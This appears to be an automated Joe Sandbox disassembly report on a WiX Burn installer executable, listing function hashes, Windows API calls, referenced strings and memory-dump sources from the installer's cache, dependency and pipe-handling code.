• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: File$CloseCreateDecryptErrorHandleLast
• String ID: Container has no verification information: %ls$Failed to open container at path: %ls$Failed to verify hash of container: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
• API String ID: 3262865546-512814969
• Opcode ID: ff47f3cf072607278ed1bc0925a80f00eba1a3f33df97d90c9438b19af1de155
• Instruction ID: b611ea3eeea541e8fb6135e76432165d3e08f52fa6aec208084692841c595b3e
• Opcode Fuzzy Hash: ff47f3cf072607278ed1bc0925a80f00eba1a3f33df97d90c9438b19af1de155
• Instruction Fuzzy Hash: AB31E9316C0215BBE722AA988C8BFDF3A15AF04B55F200117FA05792D0D2BDA9D0D6DD

APIs
• FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0042BD83,00000000,00000008,00000000,80070656), ref: 004035FF
• GetLastError.KERNEL32(?,?,?,0042BD83,00000000,00000008,00000000,80070656,?,?,00419C65,00610076,?,80070656,00000000,?), ref: 0040360C
• LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0042BD83,00000000,00000008,00000000,80070656,?,?,00419C65,00610076), ref: 00403690
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorFormatFreeLastLocalMessage
• String ID: Failed to allocate string for message.$Failed to format message for error: 0x%x$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\strutil.cpp
• API String ID: 1365068426-1061171861
• Opcode ID: 63d26adae90b94018b2cc74de0d652b00c96cb35b5a8537fba5e4b9b63b0a1e0
• Instruction ID: 5727c06d9320c0c77c35bbf621c6cb31a4d2634cec43fef6c4577a8765e5ef23
• Opcode Fuzzy Hash: 63d26adae90b94018b2cc74de0d652b00c96cb35b5a8537fba5e4b9b63b0a1e0
• Instruction Fuzzy Hash: F621C6B2D40229BBDB219F94DC09FDF3E6CEB04755F11417ABD08F6291E6798E0086E8

APIs
• CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000,00000000,00000000), ref: 0046EA14
• GetLastError.KERNEL32 ref: 0046EA21
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CreateErrorLastNamedPipe
• String ID: Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$\\.\pipe\%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
• API String ID: 4201769729-2709686045
• Opcode ID: 189c5b1d43bad1b3295600e5be8395f8a3dc9ceb920962227614a2a109f2b0bd
• Instruction ID: 06d6254b60c8b9cc8a1941fd85825239588ecbeb7b648a11d5aef6b27fe2e4e2
• Opcode Fuzzy Hash: 189c5b1d43bad1b3295600e5be8395f8a3dc9ceb920962227614a2a109f2b0bd
• Instruction Fuzzy Hash: 49115036A80214B7DB316A91CC0BF9F3B54AB01B21F504166FE00BA2D1E2BD4E50D799

APIs
• CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,200001A4,00000000,00000000,00000000,200001A4,?,00429A82,00000000), ref: 0046F150
• CoCreateInstance.OLE32(00000000,00000000,00000001,004ADDF0,00000000,?,00429A82,00000000), ref: 0046F178
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wuautil.cpp, xrefs: 0046F190
• Failed to create instance of Microsoft.Update.AutoUpdate., xrefs: 0046F184
• Failed to get CLSID for Microsoft.Update.AutoUpdate., xrefs: 0046F15C
• Microsoft.Update.AutoUpdate, xrefs: 0046F14B
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CreateFromInstanceProg
• String ID: Failed to create instance of Microsoft.Update.AutoUpdate.$Failed to get CLSID for Microsoft.Update.AutoUpdate.$Microsoft.Update.AutoUpdate$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
• API String ID: 2151042543-1828807226
• Opcode ID: 1a6b00397aad7c63e1783f218b7d2c2afee73fdfb2ec1ae6ff289c5199499e01
• Instruction ID: 9b42c38b03cfb0160408c1088280dc656ce9f0bbfd80e5f511da7e268f3b940d
• Opcode Fuzzy Hash: 1a6b00397aad7c63e1783f218b7d2c2afee73fdfb2ec1ae6ff289c5199499e01
• Instruction Fuzzy Hash: 9C01B971B807147BD7109668DC46FAB76689715B91F500036FE05FB1D0E5A49D04C6AA

Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 6cbe9d667d0cced1b1db7d963504bd4cb555dda5a89d49737e17f8d82eb215db
• Instruction ID: 991b03630b9555bab1a4770f51431c977b966d452484309af11d647ec86cb40d
• Opcode Fuzzy Hash: 6cbe9d667d0cced1b1db7d963504bd4cb555dda5a89d49737e17f8d82eb215db
• Instruction Fuzzy Hash: 61D25B71E082288FDB65CE28DD447EAB7B5EB45305F1441EBD80DE3241E778AE898F46
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to check if "ALL" was set in IGNOREDEPENDENCIES., xrefs: 0042055F
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\dependency.cpp, xrefs: 0042052B, 0042083B
                                                                                                                                                          • Failed to add the package provider key "%ls" to the planned list., xrefs: 00420829
                                                                                                                                                          • ALL, xrefs: 0042053D
                                                                                                                                                          • Failed to build the list of ignored dependents., xrefs: 00420519
                                                                                                                                                          • comres.dll, xrefs: 004205A6
                                                                                                                                                          • Failed to check the dictionary of ignored dependents., xrefs: 004206CD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID: ALL$Failed to add the package provider key "%ls" to the planned list.$Failed to build the list of ignored dependents.$Failed to check if "ALL" was set in IGNOREDEPENDENCIES.$Failed to check the dictionary of ignored dependents.$comres.dll$d:\a\wix\wix\src\burn\engine\dependency.cpp
• API String ID: 0-2150047137
• Opcode ID: 6209f3c2b4768a2ef84d212aca16cc73ea109356ca73680f81d24e10f9019fbf
• Instruction ID: fccc6b539feccfc60608c15a8bd72e201c44fd5a5f3ade842a861b89230bf9b3
• Opcode Fuzzy Hash: 6209f3c2b4768a2ef84d212aca16cc73ea109356ca73680f81d24e10f9019fbf
• Instruction Fuzzy Hash: 33C1A870A007249FEB20DF51D880BABB7F1BF98314F60456FD54967262D778A882CF58
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,.unverified,?), ref: 0041D6F9
• FindNextFileW.KERNEL32(00000000,00000010,?,?,*.*,?,?,?,.unverified,?), ref: 0041D792
• FindClose.KERNEL32(00000000,?,?,*.*,?,?,?,.unverified,?), ref: 0041D7A1
  • Part of subcall function 00401D86: GetFileAttributesW.KERNEL32(00000001,?,?,?,?,00000000,00000000), ref: 00401DEE
  • Part of subcall function 00401D86: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 00401DFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FileFind$AttributesCloseErrorFirstLastNext
• String ID: *.*$.unverified
• API String ID: 3458812364-2528915496
• Opcode ID: e916c6c94bd883675b2ec1d6df5dbf2a0384ed65a0abdd9179abc8659eb02bf2
• Instruction ID: 408372663a2dc580efef92c13a082c737f537d7f678f925cf3fd9d1462d9fe36
• Opcode Fuzzy Hash: e916c6c94bd883675b2ec1d6df5dbf2a0384ed65a0abdd9179abc8659eb02bf2
• Instruction Fuzzy Hash: 5E4192B1D00628AACB20BB61CD89BEF7778AF44705F1041ABF918A61D1D7789EC4CF58
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorLastNameUser
• String ID: Failed to get the user name.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 2054405381-3920010817
• Opcode ID: f3ae558bca10a9d4a8410607ee672f7cedc592d53f413517f2b5e06a64d42a8f
• Instruction ID: 7b4aafa6607927b588c942c758411635dc5dac1fbe723c54996afdda4ceafd32
• Opcode Fuzzy Hash: f3ae558bca10a9d4a8410607ee672f7cedc592d53f413517f2b5e06a64d42a8f
• Instruction Fuzzy Hash: 1611C871A4032877D721AA158C4AFAB776C9B00764F50427BFD04B72C1EA7CAD4086EA
APIs
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00444551,00000000,00000003), ref: 004445C9
• GetLastError.KERNEL32(?,00444551,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,004449C3,?), ref: 004445D3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ChangeConfigErrorLastService
• String ID: Failed to set service start type.$d:\a\wix\wix\src\burn\engine\msuengine.cpp
• API String ID: 1456623077-792143866
• Opcode ID: 83b8f43af9642eaf01bcc878b66a74c2286c60889a8f4a6045667ad7e59b5586
• Instruction ID: 87868150c73a105c2f8137e26c36cded8f9095487da897f112e0e46259accee7
• Opcode Fuzzy Hash: 83b8f43af9642eaf01bcc878b66a74c2286c60889a8f4a6045667ad7e59b5586
• Instruction Fuzzy Hash: 1CF0BB33A4013437E62125595C45F577E1CDB42BB5F524336FE18F62D1D6288C0042F8
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a2933c6efb17ff4954354204e5574c5a496e5015f06b6959cd73f373da724c1
• Instruction ID: f44654bca15fe9f57f10f0ac5946471ceea412dc94b2c705be801bfab338c074
• Opcode Fuzzy Hash: 4a2933c6efb17ff4954354204e5574c5a496e5015f06b6959cd73f373da724c1
• Instruction Fuzzy Hash: BC024F71E002199FDF14CFA9C9806AEF7B1FF48315F24816AD919E7382D735AA09CB94
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 00407C89
• GetSystemInfo.KERNEL32(?), ref: 00407CA4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D
• API String ID: 401686933-2746444292
• Opcode ID: 48e5a51665b371be01d0ba3d1c8f8db1ccbfcf10859a74d70b5dec09c1c9685f
• Instruction ID: 86e64882e0e6762be4dfed7664c11750bd74e8723d9e0dddae3f8a3dab5a3ade
• Opcode Fuzzy Hash: 48e5a51665b371be01d0ba3d1c8f8db1ccbfcf10859a74d70b5dec09c1c9685f
• Instruction Fuzzy Hash: 8201F772A041096BDB14DE29DC05BDE7BAAAFC4324F0CC231AD19E7291E638E9518694
APIs
  • Part of subcall function 0040241C: CreateDirectoryW.KERNELBASE(00000000,0040951C,?,00000000,?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 0040242A
  • Part of subcall function 0040241C: GetLastError.KERNEL32(?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 00402438
• DecryptFileW.ADVAPI32(?,00000000), ref: 0041DC4E
Strings
• d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041DC37
• Failed create acquisition folder., xrefs: 0041DC25
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDecryptDirectoryErrorFileLast
                                                                                                                                                          • String ID: Failed create acquisition folder.$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 4153065963-4098110870
                                                                                                                                                          • Opcode ID: 488ee8028b0bed482d1a6d9a417e47464f72536fee87483eaa9de901bb8e1dca
                                                                                                                                                          • Instruction ID: c1246b6a56e5a7b9ca52fe22d309f4493cbee6c65a54f01b572ee4631ada90b1
                                                                                                                                                          • Opcode Fuzzy Hash: 488ee8028b0bed482d1a6d9a417e47464f72536fee87483eaa9de901bb8e1dca
                                                                                                                                                          • Instruction Fuzzy Hash: 6EE09272B80221B3E1212595CC07FC6FB189B51F62F100123F708B61E1A6F4685082ED
                                                                                                                                                          APIs
                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004582C6
                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004582D0
                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 004582DD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                          • Opcode ID: bfee98ce278b4fade3776f4b17b90bd041e506e2ef25feb867d10d23fe57a4b7
                                                                                                                                                          • Instruction ID: d5a70d18d1ac26a7acd488a6148637f93a27638513b298cb8d2d56c19bffa989
                                                                                                                                                          • Opcode Fuzzy Hash: bfee98ce278b4fade3776f4b17b90bd041e506e2ef25feb867d10d23fe57a4b7
                                                                                                                                                          • Instruction Fuzzy Hash: 7D31D474901219ABCB21DF24DC8978DBBB4BF08315F5041EAE80DA7261EB749B85CF48
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004664D7: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,?,?,?,00000000,?,?,?,00466476,?), ref: 004665A3
                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0046649A
                                                                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004664AB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2114926846-0
                                                                                                                                                          • Opcode ID: 7c5e70ac89f8279d19b4ea57bb97024ee04c92d05292529b26c226a846023772
                                                                                                                                                          • Instruction ID: 91b0d2218531f0bdff2c4608e3d3d7f2afbc730aff237ce36eff0ddd7732ce50
                                                                                                                                                          • Opcode Fuzzy Hash: 7c5e70ac89f8279d19b4ea57bb97024ee04c92d05292529b26c226a846023772
                                                                                                                                                          • Instruction Fuzzy Hash: 1E1152B190421AABDB10DFE5CC85BAFB7F8FF08304F51443EA545A6241E778AA44CB59
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: *^E$0
                                                                                                                                                          • API String ID: 0-3353421320
                                                                                                                                                          • Opcode ID: bd84e55d9ef50d17c8306941367f9be0a70a3231ed31b14a85680195c2359b3e
                                                                                                                                                          • Instruction ID: 19dd0bf610b369ad09aaf5c7f3386a467d958f9471c5bfb13bb32f512fe8664f
                                                                                                                                                          • Opcode Fuzzy Hash: bd84e55d9ef50d17c8306941367f9be0a70a3231ed31b14a85680195c2359b3e
                                                                                                                                                          • Instruction Fuzzy Hash: 4DD1F2746086068FCB24DF28E484A6FB7B1FF48326B14462FDC569B352C338AD49CB59
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: dc5536ddb000377aa9e94b7a9e169a71fd4ab634e226eb3607ab556d326adc3c
                                                                                                                                                          • Instruction ID: f7f45192f8c66b68b58001092a6343ac8a981d9ab92abbee0e69d81dd101adc6
                                                                                                                                                          • Opcode Fuzzy Hash: dc5536ddb000377aa9e94b7a9e169a71fd4ab634e226eb3607ab556d326adc3c
                                                                                                                                                          • Instruction Fuzzy Hash: 01C012321A4208A78B006FF4EC09C55379CB7187027448410B519C2011C638E0508764
                                                                                                                                                          APIs
                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004641A3,?,?,00000008,?,?,00463DA6,00000000), ref: 004643D5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
